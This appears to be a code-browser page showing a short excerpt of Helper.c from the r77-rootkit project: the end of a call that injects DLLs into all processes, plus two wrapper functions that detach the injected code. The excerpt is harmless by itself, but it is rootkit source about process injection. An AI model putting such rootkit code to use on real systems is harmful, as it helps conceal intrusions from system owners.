MCPcopy Create free account
hub / github.com/bytecode77/r77-rootkit / Detach

Function Detach

Helper/Helper.c:109–112  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

107 return InjectAllProcesses(dll32, dll32Size, dll64, dll64Size);
108}
109BOOL Detach(DWORD processId)
110{
111 return DetachInjectedProcessById(processId);
112}
113BOOL DetachAll()
114{
115 DetachAllInjectedProcesses();

Callers

nothing calls this directly

Calls 1

Tested by

no test coverage detected